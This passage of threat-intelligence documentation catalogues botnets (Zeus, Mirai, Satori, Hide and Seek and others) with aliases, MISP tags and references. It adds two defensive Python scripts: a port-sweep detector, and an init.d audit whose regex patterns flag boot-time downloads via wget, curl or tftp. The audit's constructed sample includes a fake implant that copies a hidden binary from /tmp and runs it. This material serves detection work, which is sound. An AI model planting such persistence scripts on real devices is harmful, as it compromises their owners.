The attacker can create signaling havoc in specific nodes of operators by repeatedly triggering resource allocation or revocation requests.

The tag is: misp-galaxy:bhadra-framework="DoS - network"

DoS - user

The attacker can cause denial of service to mobile users.

The tag is: misp-galaxy:bhadra-framework="DoS - user"

Identity-related attacks

Identity-based attacks involve attack techniques that use user- and network-specific identifiers. Identity-based attacks harm the privacy of mobile users and produce fraudulent traffic that incurs a financial loss for operators. In most cases, identity-based attacks are used for impersonation, where an adversary impersonates a legitimate mobile user to the core network without possessing the appropriate credentials, for example to obtain free mobile services. Most of the signaling attacks that use SS7 also fall into this category. In other cases, identity-based attacks involve identity mapping, where adversaries map temporary identifiers (e.g., TMSI and GUTI) to permanent identifiers (e.g., IMSI or MSISDN). In rare cases, the IMSI can be further mapped to social media identities.

The tag is: misp-galaxy:bhadra-framework="Identity-related attacks"

Botnet

botnet galaxy.

Botnet is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

ADB.miner

A new botnet appeared over the weekend, and it’s targeting Android devices by scanning for open debug ports so it can infect victims with malware that mines the Monero cryptocurrency.

The botnet came to life on Saturday, February 3, and is targeting port 5555, which on devices running the Android OS is the port used by the operating system’s native Android Debug Bridge (ADB), a debugging interface that grants access to some of the operating system’s most sensitive features.

So far only devices running the Android OS have been infected, such as smartphones, smart TVs, and set-top boxes, according to security researchers from Qihoo 360's Network Security Research Lab (Netlab) division, who discovered the botnet and named it ADB.miner.

The tag is: misp-galaxy:botnet="ADB.miner"

Table 696. Table References

Links

https://www.bleepingcomputer.com/news/security/android-devices-targeted-by-new-monero-mining-botnet/

Bagle

Bagle (also known as Beagle) was a mass-mailing computer worm affecting Microsoft Windows. The first strain, Bagle.A, did not propagate widely. A second variant, Bagle.B, was considerably more virulent.

The tag is: misp-galaxy:botnet="Bagle"

Bagle is also known as:

  • Beagle

  • Mitglieder

  • Lodeight

Bagle has relationships with:

  • similar: misp-galaxy:malpedia="Bagle" with estimative-language:likelihood-probability="likely"

Table 697. Table References

Links

https://en.wikipedia.org/wiki/Bagle_(computer_worm)

Marina Botnet

Around the same time Bagle was sending spam messages all over the world, the Marina Botnet quickly made a name for itself. With over 6 million bots pumping out spam emails every single day, it became apparent these “hacker tools” could get out of hand very quickly. At its peak, Marina Botnet delivered 92 billion spam emails per day.

The tag is: misp-galaxy:botnet="Marina Botnet"

Marina Botnet is also known as:

  • Damon Briant

  • BOB.dc

  • Cotmonger

  • Hacktool.Spammer

  • Kraken

Marina Botnet has relationships with:

  • similar: misp-galaxy:botnet="Kraken" with estimative-language:likelihood-probability="likely"

Table 698. Table References

Links

https://en.wikipedia.org/wiki/Botnet

Torpig

Torpig, also known as Anserin or Sinowal, is a botnet spread through systems compromised by the Mebroot rootkit, which is delivered by a variety of trojan horses, for the purpose of collecting sensitive personal and corporate data such as bank account and credit card information. It targets computers that use Microsoft Windows, recruiting a network of zombies for the botnet. Torpig circumvents antivirus software through the use of rootkit technology and scans the infected system for credentials, accounts and passwords, as well as potentially allowing attackers full access to the computer. It is also purportedly capable of modifying data on the computer, and can perform man-in-the-browser attacks.

The tag is: misp-galaxy:botnet="Torpig"

Torpig is also known as:

  • Sinowal

  • Anserin

Torpig has relationships with:

  • similar: misp-galaxy:malpedia="Sinowal" with estimative-language:likelihood-probability="likely"

Table 699. Table References

Links

https://en.wikipedia.org/wiki/Torpig

Storm

The Storm botnet or Storm worm botnet (also known as Dorf botnet and Ecard malware) is a remotely controlled network of "zombie" computers (or "botnet") that have been linked by the Storm Worm, a Trojan horse spread through e-mail spam. At its height in September 2007, the Storm botnet was running on anywhere from 1 million to 50 million computer systems, and accounted for 8% of all malware on Microsoft Windows computers. It was first identified around January 2007, having been distributed by email with subjects such as "230 dead as storm batters Europe," giving it its well-known name. The botnet began to decline in late 2007, and by mid-2008, had been reduced to infecting about 85,000 computers, far less than it had infected a year earlier.

The tag is: misp-galaxy:botnet="Storm"

Storm is also known as:

  • Nuwar

  • Peacomm

  • Zhelatin

  • Dorf

  • Ecard

Table 700. Table References

Links

https://en.wikipedia.org/wiki/Storm_botnet

Rustock

The tag is: misp-galaxy:botnet="Rustock"

Rustock is also known as:

  • RKRustok

  • Costrat

Rustock has relationships with:

  • similar: misp-galaxy:malpedia="Rustock" with estimative-language:likelihood-probability="likely"

Table 701. Table References

Links

https://en.wikipedia.org/wiki/Rustock_botnet

Donbot

The tag is: misp-galaxy:botnet="Donbot"

Donbot is also known as:

  • Buzus

  • Bachsoy

Donbot has relationships with:

  • similar: misp-galaxy:malpedia="Buzus" with estimative-language:likelihood-probability="likely"

Table 702. Table References

Links

https://en.wikipedia.org/wiki/Donbot_botnet

Cutwail

The Cutwail botnet, founded around 2007, is a botnet mostly involved in sending spam e-mails. The bot is typically installed on infected machines by a Trojan component called Pushdo. It affects computers running Microsoft Windows. Related to: Wigon, Pushdo.

The tag is: misp-galaxy:botnet="Cutwail"

Cutwail is also known as:

  • Pandex

  • Mutant

Cutwail has relationships with:

  • similar: misp-galaxy:malpedia="Cutwail" with estimative-language:likelihood-probability="likely"

Table 703. Table References

Links

https://en.wikipedia.org/wiki/Cutwail_botnet

Akbot

Akbot was a computer virus that infected an estimated 1.3 million computers and added them to a botnet.

The tag is: misp-galaxy:botnet="Akbot"

Akbot has relationships with:

  • similar: misp-galaxy:tool="Akbot" with estimative-language:likelihood-probability="likely"

Table 704. Table References

Links

https://en.wikipedia.org/wiki/Akbot

Srizbi

Srizbi was considered one of the world's largest botnets, responsible for sending out more than half of all the spam sent by all the major botnets combined. The botnet consisted of computers infected by the Srizbi trojan, which sent spam on command. Srizbi suffered a massive setback in November 2008 when hosting provider Janka Cartel was taken down; global spam volumes dropped by up to 93% as a result of this action.

The tag is: misp-galaxy:botnet="Srizbi"

Srizbi is also known as:

  • Cbeplay

  • Exchanger

Table 705. Table References

Links

https://en.wikipedia.org/wiki/Srizbi_botnet

Lethic

The Lethic Botnet (initially discovered around 2008) is a botnet consisting of an estimated 210 000 - 310 000 individual machines which are mainly involved in pharmaceutical and replica spam. At the peak of its existence the botnet was responsible for 8-10% of all the spam sent worldwide.

The tag is: misp-galaxy:botnet="Lethic"

Lethic has relationships with:

  • similar: misp-galaxy:malpedia="Lethic" with estimative-language:likelihood-probability="likely"

Table 706. Table References

Links

https://en.wikipedia.org/wiki/Lethic_botnet

Xarvester

The tag is: misp-galaxy:botnet="Xarvester"

Xarvester is also known as:

  • Rlsloup

  • Pixoliz

Table 707. Table References

Links

https://krebsonsecurity.com/tag/xarvester/

Sality

Sality is the classification for a family of malicious software (malware), which infects files on Microsoft Windows systems. Sality was first discovered in 2003 and has advanced over the years to become a dynamic, enduring and full-featured form of malicious code. Systems infected with Sality may communicate over a peer-to-peer (P2P) network for the purpose of relaying spam, proxying of communications, exfiltrating sensitive data, compromising web servers and/or coordinating distributed computing tasks for the purpose of processing intensive tasks (e.g. password cracking). Since 2010, certain variants of Sality have also incorporated the use of rootkit functions as part of an ongoing evolution of the malware family. Because of its continued development and capabilities, Sality is considered to be one of the most complex and formidable forms of malware to date.

The tag is: misp-galaxy:botnet="Sality"

Sality is also known as:

  • Sector

  • Kuku

  • Sality

  • SalLoad

  • Kookoo

  • SaliCode

  • Kukacka

Sality has relationships with:

  • similar: misp-galaxy:malpedia="Sality" with estimative-language:likelihood-probability="likely"

Table 708. Table References

Links

https://en.wikipedia.org/wiki/Sality

Mariposa

The Mariposa botnet, discovered December 2008, is a botnet mainly involved in cyberscamming and denial-of-service attacks. Before the botnet itself was dismantled on 23 December 2009, it consisted of up to 12 million unique IP addresses or up to 1 million individual zombie computers infected with the "Butterfly (mariposa in Spanish) Bot", making it one of the largest known botnets.

The tag is: misp-galaxy:botnet="Mariposa"

Table 709. Table References

Links

https://en.wikipedia.org/wiki/Mariposa_botnet

Conficker

Conficker, also known as Downup, Downadup and Kido, is a computer worm targeting the Microsoft Windows operating system that was first detected in November 2008. It uses flaws in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet, and has been unusually difficult to counter because of its combined use of many advanced malware techniques. The Conficker worm infected millions of computers including government, business and home computers in over 190 countries, making it the largest known computer worm infection since the 2003 Welchia.

The tag is: misp-galaxy:botnet="Conficker"

Conficker is also known as:

  • DownUp

  • DownAndUp

  • DownAdUp

  • Kido

Conficker has relationships with:

  • similar: misp-galaxy:malpedia="Conficker" with estimative-language:likelihood-probability="likely"

Table 710. Table References

Links

https://en.wikipedia.org/wiki/Conficker

Waledac

Waledac, also known by its aliases Waled and Waledpak, was a botnet mostly involved in e-mail spam and malware. In March 2010 the botnet was taken down by Microsoft.

The tag is: misp-galaxy:botnet="Waledac"

Waledac is also known as:

  • Waled

  • Waledpak

Table 711. Table References

Links

https://en.wikipedia.org/wiki/Waledac_botnet

Maazben

A new botnet, dubbed Maazben, has also been observed and is also growing rapidly. MessageLabs Intelligence has been tracking the growth of Maazben since its infancy in late May and early June. Its dominance in terms of the proportion of spam has been accelerating in the last 30 days from just over 0.5% of all spam, peaking at 4.5% of spam when it is most active. Currently spam from Maazben accounts for approximately 1.4% of all spam, but this is likely to increase significantly over time, particularly since both overall spam per minute sent and spam per bot per minute are increasing.

The tag is: misp-galaxy:botnet="Maazben"

Table 712. Table References

Links

https://www.symantec.com/connect/blogs/evaluating-botnet-capacity

Onewordsub

The tag is: misp-galaxy:botnet="Onewordsub"

Table 713. Table References

Links

https://www.botnets.fr/wiki/OneWordSub

Gheg

Tofsee, also known as Gheg, is another botnet analyzed by CERT Polska. Its main job is to send spam, but it is able to do other tasks as well. It is possible thanks to the modular design of this malware – it consists of the main binary (the one user downloads and infects with), which later downloads several additional modules from the C2 server – they modify code by overwriting some of the called functions with their own. An example of some actions these modules perform is spreading by posting click-bait messages on Facebook and VKontakte (Russian social network).

The tag is: misp-galaxy:botnet="Gheg"

Gheg is also known as:

  • Tofsee

  • Mondera

Gheg has relationships with:

  • similar: misp-galaxy:malpedia="Tofsee" with estimative-language:likelihood-probability="likely"

Table 714. Table References

Links

https://www.cert.pl/en/news/single/tofsee-en/

Nucrypt

The tag is: misp-galaxy:botnet="Nucrypt"

Table 715. Table References

Links

https://www.botnets.fr/wiki.old/index.php?title=Nucrypt&setlang=en

Wopla

The tag is: misp-galaxy:botnet="Wopla"

Table 716. Table References

Links

https://www.botnets.fr/wiki.old/index.php/Wopla

Asprox

The Asprox botnet (discovered around 2008), also known by its aliases Badsrc and Aseljo, is a botnet mostly involved in phishing scams and performing SQL injections into websites in order to spread malware.

The tag is: misp-galaxy:botnet="Asprox"

Asprox is also known as:

  • Badsrc

  • Aseljo

  • Danmec

  • Hydraflux

Asprox has relationships with:

  • similar: misp-galaxy:malpedia="Asprox" with estimative-language:likelihood-probability="likely"

Table 717. Table References

Links

https://en.wikipedia.org/wiki/Asprox_botnet

Spamthru

Spam Thru represented an exponential jump in the level of sophistication and complexity of these botnets, harnessing a 70,000-strong peer-to-peer botnet seeded with the Spam Thru Trojan. Spam Thru is also known by the aliases Backdoor.Win32.Agent.uu, Spam-DComServ and Troj_Agent.Bor. Spam Thru was unique because it had its own antivirus engine designed to remove any other malicious programs residing on the same infected host, so that it could get unlimited access to the machine's processing power as well as bandwidth. It also had the potential to be 10 times more productive than most other botnets while evading detection because of its built-in defences.

The tag is: misp-galaxy:botnet="Spamthru"

Spamthru is also known as:

  • Spam-DComServ

  • Covesmer

  • Xmiler

Table 718. Table References

Links

http://www.root777.com/security/analysis-of-spam-thru-botnet/

Gumblar

Gumblar is a malicious JavaScript trojan horse file that redirects a user’s Google searches, and then installs rogue security software. Also known as Troj/JSRedir-R this botnet first appeared in 2009.

The tag is: misp-galaxy:botnet="Gumblar"

Table 719. Table References

Links

https://en.wikipedia.org/wiki/Gumblar

BredoLab

The Bredolab botnet, also known by its alias Oficla, was a Russian botnet mostly involved in viral e-mail spam. Before the botnet was eventually dismantled in November 2010 through the seizure of its command and control servers, it was estimated to consist of millions of zombie computers.

The tag is: misp-galaxy:botnet="BredoLab"

BredoLab is also known as:

  • Oficla

BredoLab has relationships with:

  • similar: misp-galaxy:tool="Oficla" with estimative-language:likelihood-probability="likely"

Table 720. Table References

Links

https://en.wikipedia.org/wiki/Bredolab_botnet

Grum

The Grum botnet, also known by its alias Tedroo and Reddyb, was a botnet mostly involved in sending pharmaceutical spam e-mails. Once the world’s largest botnet, Grum can be traced back to as early as 2008. At the time of its shutdown in July 2012, Grum was reportedly the world’s 3rd largest botnet, responsible for 18% of worldwide spam traffic.

The tag is: misp-galaxy:botnet="Grum"

Grum is also known as:

  • Tedroo

  • Reddyb

Table 721. Table References

Links

https://en.wikipedia.org/wiki/Grum_botnet

Mega-D

The Mega-D, also known by its alias of Ozdok, is a botnet that at its peak was responsible for sending 32% of spam worldwide.

The tag is: misp-galaxy:botnet="Mega-D"

Mega-D is also known as:

  • Ozdok

Table 722. Table References

Links

https://en.wikipedia.org/wiki/Mega-D_botnet

Kraken

The Kraken botnet was the world’s largest botnet as of April 2008. Researchers say that Kraken infected machines in at least 50 of the Fortune 500 companies and grew to over 400,000 bots. It was estimated to send 9 billion spam messages per day. Kraken botnet malware may have been designed to evade anti-virus software, and employed techniques to stymie conventional anti-virus software.

The tag is: misp-galaxy:botnet="Kraken"

Kraken is also known as:

  • Kracken

Kraken has relationships with:

  • similar: misp-galaxy:botnet="Marina Botnet" with estimative-language:likelihood-probability="likely"

Table 723. Table References

Links

https://en.wikipedia.org/wiki/Kraken_botnet

Festi

The Festi botnet, also known by its alias of Spamnost, is a botnet mostly involved in email spam and denial of service attacks.

The tag is: misp-galaxy:botnet="Festi"

Festi is also known as:

  • Spamnost

Table 724. Table References

Links

https://en.wikipedia.org/wiki/Festi_botnet

Vulcanbot

Vulcanbot is the name of a botnet predominantly spread in Vietnam, apparently with political motives. It is thought to have begun in late 2009.

The tag is: misp-galaxy:botnet="Vulcanbot"

Table 725. Table References

Links

https://en.wikipedia.org/wiki/Vulcanbot

LowSec

The tag is: misp-galaxy:botnet="LowSec"

LowSec is also known as:

  • LowSecurity

  • FreeMoney

  • Ring0.Tools

TDL4

Alureon (also known as TDSS or TDL-4) is a trojan and bootkit created to steal data by intercepting a system's network traffic and searching for banking usernames and passwords, credit card data, PayPal information, social security numbers, and other sensitive user data. Following a series of customer complaints, Microsoft determined that Alureon caused a wave of BSoDs on some 32-bit Microsoft Windows systems. The update, MS10-015, triggered these crashes by breaking assumptions made by the malware author(s).

The tag is: misp-galaxy:botnet="TDL4"

TDL4 is also known as:

  • TDSS

  • Alureon

TDL4 has relationships with:

  • similar: misp-galaxy:malpedia="Alureon" with estimative-language:likelihood-probability="likely"

Table 726. Table References

Links

https://en.wikipedia.org/wiki/Alureon#TDL-4

Zeus

Zeus, ZeuS, or Zbot is a Trojan horse malware package that runs on versions of Microsoft Windows. While it can be used to carry out many malicious and criminal tasks, it is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing. It is also used to install the CryptoLocker ransomware. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009 security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinessWeek. Similarly to Koobface, Zeus has also been used to trick victims of tech support scams into giving the scam artists money through pop-up messages that claim the user has a virus, when in reality they might have no viruses at all. The scammers may use programs such as Command prompt or Event viewer to make the user believe that their computer is infected.

The tag is: misp-galaxy:botnet="Zeus"

Zeus is also known as:

  • Zbot

  • ZeuS

  • PRG

  • Wsnpoem

  • Gorhax

  • Kneber

Zeus has relationships with:

  • similar: misp-galaxy:tool="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:banker="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Zeus" with estimative-language:likelihood-probability="likely"

Table 727. Table References

Links

https://en.wikipedia.org/wiki/Zeus_(malware)

Kelihos

The Kelihos botnet, also known as Hlux, is a botnet mainly involved in spamming and the theft of bitcoins.

The tag is: misp-galaxy:botnet="Kelihos"

Kelihos is also known as:

  • Hlux

Kelihos has relationships with:

  • similar: misp-galaxy:malpedia="Kelihos" with estimative-language:likelihood-probability="likely"

Table 728. Table References

Links

https://en.wikipedia.org/wiki/Kelihos_botnet

Ramnit

Ramnit is a computer worm affecting Windows users. It was estimated to have infected 800 000 Windows PCs between September and December 2011. The Ramnit botnet was dismantled by Europol and Symantec in 2015; at that time the infection was estimated at 3 200 000 PCs.

The tag is: misp-galaxy:botnet="Ramnit"

Ramnit has relationships with:

  • similar: misp-galaxy:banker="Ramnit" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Ramnit" with estimative-language:likelihood-probability="likely"

Table 729. Table References

Links

https://en.wikipedia.org/wiki/Botnet

Zer0n3t

The tag is: misp-galaxy:botnet="Zer0n3t"

Zer0n3t is also known as:

  • Fib3rl0g1c

  • Zer0n3t

  • Zer0Log1x

Chameleon

The Chameleon botnet is a botnet that was discovered on February 28, 2013 by the security research firm, spider.io. It involved the infection of more than 120,000 computers and generated, on average, 6 million US dollars per month from advertising traffic. This traffic was generated on infected systems and looked to advertising parties as regular end users which browsed the Web, because of which it was seen as legitimate web traffic. The affected computers were all Windows PCs with the majority being private PCs (residential systems).

The tag is: misp-galaxy:botnet="Chameleon"

Table 730. Table References

Links

https://en.wikipedia.org/wiki/Chameleon_botnet

Mirai

Mirai (Japanese for "the future", 未来) is a malware that turns networked devices running Linux into remotely controlled "bots" that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers. The Mirai botnet was first found in August 2016 by MalwareMustDie, a whitehat malware research group, and has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs’s web site, an attack on French web host OVH, and the October 2016 Dyn cyberattack.

The tag is: misp-galaxy:botnet="Mirai"

Mirai has relationships with:

  • similar: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Mirai (ELF)" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Owari" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

Table 731. Table References

Links

https://en.wikipedia.org/wiki/Mirai_(malware)

https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/

https://www.bleepingcomputer.com/news/security/mirai-iot-malware-uses-aboriginal-linux-to-target-multiple-platforms/

https://www.bleepingcomputer.com/news/security/new-mirai-variant-comes-with-27-exploits-targets-enterprise-devices/

XorDDoS

XOR DDoS is a Linux trojan used to perform large-scale DDoS attacks.

The tag is: misp-galaxy:botnet="XorDDoS"

Table 732. Table References

Links

https://en.wikipedia.org/wiki/Xor_DDoS

Satori

According to a report Li shared with Bleeping Computer today, the Mirai Satori variant is quite different from all previous pure Mirai variants. Previous Mirai versions infected IoT devices and then downloaded a Telnet scanner component that attempted to find other victims and infect them with the Mirai bot. The Satori variant does not use a scanner but uses two embedded exploits that will try to connect to remote devices on ports 37215 and 52869. Effectively, this makes Satori an IoT worm, able to spread by itself without the need for separate components.

The tag is: misp-galaxy:botnet="Satori"

Satori is also known as:

  • Okiru

Satori has relationships with:

  • similar: misp-galaxy:tool="Satori" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Satori" with estimative-language:likelihood-probability="likely"

Table 733. Table References

Links

https://www.bleepingcomputer.com/news/security/satori-botnet-has-sudden-awakening-with-over-280-000-active-bots/

https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant
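
Both ADB.miner (scanning for open ADB on TCP/5555, described earlier on this page) and Satori (connecting to ports 37215 and 52869) announce themselves the same way from the network's point of view: one source touching many hosts on one unusual port in a short time. The detector below is an added example for this page, not code from Netlab 360, Fortinet or the botnets' authors. It works on NetFlow-style records `(unix_seconds, src_ip, dst_ip, dst_port)` constructed in the script; the port labels are taken from the page text, and the thresholds are assumptions to tune per network.

```python
"""Flag hosts sweeping the ports the page associates with ADB.miner and Satori.

Added example for this page, not code from Netlab 360 or any of the botnets'
authors. The flow records are constructed by hand in a NetFlow-like shape:
(unix_seconds, src_ip, dst_ip, dst_port). The port labels come from the page.
"""
from collections import defaultdict

WATCHED_PORTS = {
    5555: "Android Debug Bridge (ADB.miner)",
    37215: "Satori embedded exploit target",
    52869: "Satori embedded exploit target",
}

# Constructed sample: one source sweeps a /24 on 5555, another on 37215, plus
# a developer box talking to a single device on 5555 and ordinary HTTPS.
FLOWS = (
    [(1000 + i, "203.0.113.7", f"192.0.2.{i}", 5555) for i in range(1, 41)]
    + [(2000 + i, "198.51.100.9", f"192.0.2.{i}", 37215) for i in range(1, 25)]
    + [(3000, "192.0.2.50", "192.0.2.51", 5555),
       (3001, "192.0.2.50", "192.0.2.51", 5555),
       (3002, "192.0.2.60", "192.0.2.70", 443)]
)


def sweeps(flows, min_targets=16, window_seconds=300):
    """Return {(src, dport): peak_distinct_targets} for sources that reached at
    least min_targets distinct hosts on one watched port within window_seconds."""
    by_key = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport in WATCHED_PORTS:
            by_key[(src, dport)].append((ts, dst))
    hits = {}
    for key, events in by_key.items():
        events.sort()
        in_window = defaultdict(int)   # dst -> number of events still inside the window
        lo = 0
        for ts, dst in events:
            in_window[dst] += 1
            while events[lo][0] < ts - window_seconds:   # drop expired events
                old = events[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            if len(in_window) >= min_targets:
                hits[key] = max(hits.get(key, 0), len(in_window))
    return hits


def report(flows, **kw):
    """Human-readable lines, one per sweeping source."""
    return [f"{src} swept {n} hosts on tcp/{port} ({WATCHED_PORTS[port]})"
            for (src, port), n in sorted(sweeps(flows, **kw).items())]


if __name__ == "__main__":
    print("\n".join(report(FLOWS)))
```

The developer machine that repeatedly connects to one device on 5555 is not flagged, because the rule counts distinct destinations rather than connection attempts; that is the difference between legitimate ADB use and a worm looking for victims. The same logic applies to any port list, so a SOC can extend `WATCHED_PORTS` as new variants appear.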

BetaBot

The tag is: misp-galaxy:botnet="BetaBot"

BetaBot has relationships with:

  • similar: misp-galaxy:malpedia="BetaBot" with estimative-language:likelihood-probability="likely"

Hajime

Hajime (meaning 'beginning' in Japanese) is an IoT worm that was first mentioned on 16 October 2016 in a public report by Rapidity Networks. One month later we saw the first samples being uploaded from Spain to VT. This worm builds a huge P2P botnet (almost 300,000 devices at the time of publishing this blogpost), but its real purpose remains unknown. It is worth mentioning that in the past, the Hajime IoT botnet was never used for massive DDoS attacks, and its existence was a mystery for many researchers, as the botnet only gathered infected devices but almost never did anything with them (except scan for other vulnerable devices).

The tag is: misp-galaxy:botnet="Hajime"

Hajime has relationships with:

  • similar: misp-galaxy:malpedia="Hajime" with estimative-language:likelihood-probability="likely"

Table 734. Table References

Links

https://www.bleepingcomputer.com/news/security/hajime-botnet-makes-a-comeback-with-massive-scan-for-mikrotik-routers/

https://en.wikipedia.org/wiki/Hajime_(malware)

https://securelist.com/hajime-the-mysterious-evolving-botnet/78160/

Muhstik

The botnet is exploiting the CVE-2018-7600 vulnerability —also known as Drupalgeddon 2— to access a specific URL and gain the ability to execute commands on a server running the Drupal CMS. At the technical level, Netlab says Muhstik is built on top of Tsunami, a very old strain of malware that has been used for years to create botnets by infecting Linux servers and smart devices running Linux-based firmware. Crooks have used Tsunami initially for DDoS attacks, but its feature-set has greatly expanded after its source code leaked online. The Muhstik version of Tsunami, according to a Netlab report published today, can launch DDoS attacks, install the XMRig Monero miner, or install the CGMiner to mine Dash cryptocurrency on infected hosts. Muhstik operators are using these three payloads to make money via the infected hosts.

The tag is: misp-galaxy:botnet="Muhstik"

Table 735. Table References

Links

https://www.bleepingcomputer.com/news/security/big-iot-botnet-starts-large-scale-exploitation-of-drupalgeddon-2-vulnerability/

Hide and Seek

Security researchers have discovered the first IoT botnet malware strain that can survive device reboots and remain on infected devices after the initial compromise. This is a major game-changing moment in the realm of IoT and router malware. Until today, equipment owners could always remove IoT malware from their smart devices, modems, and routers by resetting the device. The reset operation flushed the device's flash memory, where the device would keep all its working data, including IoT malware strains. But today, Bitdefender researchers announced they found an IoT malware strain that under certain circumstances copies itself to /etc/init.d/, a directory that houses daemon scripts on Linux-based operating systems, like the ones on routers and IoT devices. By placing itself in this directory, the malware ensures that the device's OS will automatically start its process after the next reboot.

The tag is: misp-galaxy:botnet="Hide and Seek"

Hide and Seek is also known as:

  • HNS

  • Hide 'N Seek

Hide and Seek has relationships with:

  • similar: misp-galaxy:malpedia="Hide and Seek" with estimative-language:likelihood-probability="likely"

Table 736. Table References

Links

https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/

https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/

https://www.bleepingcomputer.com/news/security/hide-and-seek-botnet-adds-infection-vector-for-android-devices/
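
Persistence through /etc/init.d/ is also where it can be found again. The audit below is an added example for this page, not code from Bitdefender or the HNS authors: it compares an init directory against a baseline of script names expected from the vendor firmware and applies a few content heuristics (volatile paths, downloaders, hidden dot-files). The directory it inspects is constructed in the script as a stand-in for /etc/init.d on a device, and the baseline set and heuristics are assumptions made for the example; a real baseline would come from a clean firmware image or a known-good device of the same model.

```python
"""Audit an init.d directory for boot-time persistence of the kind Hide and Seek uses.

Added example for this page, not code from Bitdefender or the HNS authors.
build_sample_tree() creates a throw-away directory standing in for /etc/init.d
on an embedded device; its scripts are constructed here. The 'baseline' is the
set of script names expected from the vendor firmware (an assumption for this
example; take it from a clean firmware image in practice).
"""
import os
import re
import tempfile

# Heuristics for a script that should not be in a vendor init directory
SUSPICIOUS = [
    (re.compile(rb"/tmp/|/var/tmp/|/dev/shm/"), "references a volatile directory"),
    (re.compile(rb"\b(wget|curl|tftp)\b"), "downloads content at boot"),
    (re.compile(rb"/\.[A-Za-z0-9_]+\b"), "runs or copies a hidden (dot) file"),
]

BASELINE = {"S40network", "S50dropbear"}


def audit_initd(initd_dir, baseline):
    """Return sorted (script_name, reason) findings for a directory of init scripts."""
    findings = []
    for entry in sorted(os.scandir(initd_dir), key=lambda e: e.name):
        if not entry.is_file(follow_symlinks=False):
            continue
        if entry.name not in baseline:
            findings.append((entry.name, "not in firmware baseline"))
        with open(entry.path, "rb") as fh:
            body = fh.read()
        for pattern, reason in SUSPICIOUS:
            if pattern.search(body):
                findings.append((entry.name, reason))
    return findings


def build_sample_tree():
    """Constructed stand-in for /etc/init.d: two vendor scripts and one implant."""
    root = tempfile.mkdtemp(prefix="initd-sample-")
    scripts = {
        "S40network": "#!/bin/sh\n/sbin/ifup -a\n",
        "S50dropbear": "#!/bin/sh\n/usr/sbin/dropbear -p 22\n",
        "S99zzz": "#!/bin/sh\ncp /tmp/.x /usr/bin/.x\n/usr/bin/.x -p 9000 &\n",
    }
    for name, body in scripts.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o755)
    return root


if __name__ == "__main__":
    for name, reason in audit_initd(build_sample_tree(), BASELINE):
        print(f"{name}: {reason}")
```

Run this against a filesystem image or a mounted flash partition from a trusted host rather than on the live device: a running implant can hide from tools executed on the box it owns. Matching on script names is the weakest form of the baseline; comparing hashes of the expected scripts against the firmware image catches a vendor script that has been edited in place rather than a new one added beside it.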

Mettle

Command-and-control panel and the scanner of this botnet is hosted on a server residing in Vietnam. Attackers have been utilizing an open-sourced Mettle attack module to implant malware on vulnerable routers.

The tag is: misp-galaxy:botnet="Mettle"

Table 737. Table References

Links

https://thehackernews.com/2018/05/botnet-malware-hacking.html

Owari

IoT botnet; a Mirai variant that has added three exploits to its arsenal. After a successful exploit, this bot downloads its payload, the Owari bot (another Mirai variant) or the Omni bot. The author goes by the name WICKED.

The tag is: misp-galaxy:botnet="Owari"

Owari has relationships with:

  • similar: misp-galaxy:malpedia="Owari" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

Table 738. Table References

Links

https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html

Brain Food

Brain Food is usually the second step in a chain of redirections, its PHP code is polymorphic and obfuscated with multiple layers of base64 encoding. Backdoor functionalities are also embedded in the code allowing remote execution of shell code on web servers which are configured to allow the PHP 'system' command.

The tag is: misp-galaxy:botnet="Brain Food"

Table 739. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/brain-food-botnet-gives-website-operators-heartburn

Pontoeb

The bot gathers information from the infected system through WMI queries (SerialNumber, SystemDrive, operating system, processor architecture), which it then sends back to a remote attacker. It installs a backdoor giving an attacker the possibility to run commands such as: download a file, update itself, visit a website, and perform HTTP, SYN and UDP flooding.

The tag is: misp-galaxy:botnet="Pontoeb"

Pontoeb is also known as:

  • N0ise

Table 740. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:MSIL/Pontoeb.J

http://dataprotectioncenter.com/general/are-you-beta-testing-malware/

Trik Spam Botnet

The tag is: misp-galaxy:botnet="Trik Spam Botnet"

Trik Spam Botnet is also known as:

  • Trik Trojan

Table 741. Table References

Links

https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/

Madmax

The tag is: misp-galaxy:botnet="Madmax"

Madmax is also known as:

  • Mad Max

Madmax has relationships with:

